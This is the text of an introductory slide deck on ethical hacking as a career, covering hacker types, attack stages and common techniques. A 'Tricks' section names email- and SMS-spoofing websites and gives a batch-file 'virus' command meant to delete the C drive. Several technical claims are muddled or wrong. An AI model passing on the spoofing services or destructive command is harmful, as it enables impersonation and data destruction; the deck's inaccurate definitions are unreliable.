Ethical hacking is performing security testing with an organization's permission to help improve security. There are different types of hackers - white hats work legally to protect systems, black hats hack maliciously, and grey hats have a mix of motives. The hacking process involves steps like footprinting, scanning, enumeration, access, privilege escalation, and covering tracks. Common hacking techniques discussed include phishing, keyloggers, trojans, SQL injection, using the Kali Linux distribution, and Bluetooth attacks. Ethical hackers are certified through exams like the CEH to legally test security as penetration testers.

1. ETHICAL HACKING
....AS A CAREER OBJECTIVE
j

2. DIFFERENCE BETWEEN SECURITY
AND PROTECTION
Security and protection are extremely close
concepts though not same.
 Security measures are adopted to increase
the level of protection
The feeling of protection arises when one
has enough security measures
Security is a type of protection against
external threats.

3. HACKER AND ETHICAL HACKER
 Hacker
• Access computer system or network without
authorization
• Breaks the law
 Ethical Hacker
• Performs most of the same activities but with owner’s
permission
• Employed by companies to perform Penetration Tests

4. TYPES OF HACKER
 White Hat Hacker
• Good guys
• Don’t use their skill for illegal purpose
• Computer security experts and help to protect from
Black Hats.
Black Hat Hacker
• Bad guys
• Use their skill maliciously for personal gain
• Hack banks, steal credit cards and deface websites
 Grey Hat Hacker
• It is a combination of White hat n Black Hat Hackers
• Goal of grey hat hackers is to provide national security

5. HACKING PROCESS
Footprinting
Scanning
Enumeration
Attack and Gaining
Access
Escalating Privilege,
Covering Tracks and
Creating Backdoors

6. TYPES OF HACKING
Phishing
Key loggers
Trojans
Sql injection
Kali Linux (back-track)
Bluetooth hacking

7. PHISHING
• Pronounced "fishing“
• The word has its Origin from two words “Password Harvesting” or fishing for Passwords
• Phishing is an online form of pretexting, a kind of deception in which an attacker
pretends to be someone else in order to obtain sensitive information from the victim
• Also known as "brand spoofing“
• Phishers are phishing artists

8. KEYLOGGING
A program or hardware device that captures every key depression on the computer
Key Loggers record keystrokes:
• Legitimate use: Monitor employee productivity
• Illegal uses: Steal passwords, usernames, and other personal/corporate data
There are ways to protect yourself:
• Be aware of what’s installed on your computer
• Use caution when surfing the internet
• Keep your computer’s security software
updated

9. TROJAN HORSE
A computer virus is a computer program that can copy itself and infect a computer without
permission or knowledge of the user.
Type Of Trojan Horse Hacking
 There are two types of Trojan Horse :
 -Time Bomb and Logic Bomb
 -Droppers
We need to be careful when download something.
We also need an anti-virus to protect our computer
from be infected by virus.

10. SQL INJECTION:
• SQL injection is a code injection technique that exploits a security vulnerability occurring in
the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user
input is not strongly typed.
• URL based injection:
• Avoid using clear text when coding in SQL.
• If your database and webpage are constructed in a way where you can view the
data, it’s open to injection.
• http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
• As in prior example, you could add a drop, or other command, to alter the
database.
• Passwords, and other sensitive information need to be either encrypted or one way
hashed. There is no full proof way to defend from injection, but by limiting sensitive
information, you can insure that your information is at least somewhat protected.

11. Kali Linux is a Debian-derived Linux
distribution designed for digital
forensics and penetration testing. It is
maintained and funded by Offensive
Security Ltd
* It is used to hack any anti virus, website..etc

12. BLUETOOTH ATTACK
• Why Bluesnarfing attack happens ?
- vendors implementation of OBEX protocol
• Three profiles use the OBEX protocol:
- Synchronization Profile (secure)
- File Transfer Profile (secure)
- Object Push (insecure)
File Transfer
Profile
Aplication
Object Push
Business
Card
Synchronization
Phone Book,
Calender
OBEX
Lower Layers
Application Layer
Session Layer

13. TRICKS
• EMAIL FORGING
• SMS FORGING
• Virus commands

14. EMAIL FORGING
Definition:
Email Forging is the art of sending an email from the victim’s email account without
knowing the password.
Working:
• ATTACKER-----Sends Forged email----- FROM VICTIM
WEBSITES: https://emkei.cz, www.anonymailer.net...

15. SMS FORGING
• Now the concept of SMS forging lies in changing the SCCP packer which
contains
the sender information prior delivering to the SMS gateway.
• The intruder can change the SCCP packet and can send that packet to any
of the receiver as a spoofed SMS.
• Some of the Website on the net also provide this facility.
• To provide such service is not legal and the user using this may lead so
serious consequences with law.
• Website: http://www.spranked.com

16. Open Notepad and copy below code into
it.
@Echo off
Del C: *.* |y
2. Save this file as virus.bat (Name can
be anything but .bat is must)
3. Now, running this file will delete all
the content of C Drive.
Virus using commands on notepad

17. The Certified Ethical Hacker is
a professional certification, provided by
the International Council of E-Commerce
Consultants (EC-Council.)
CEH V8

19. QUESTIONS???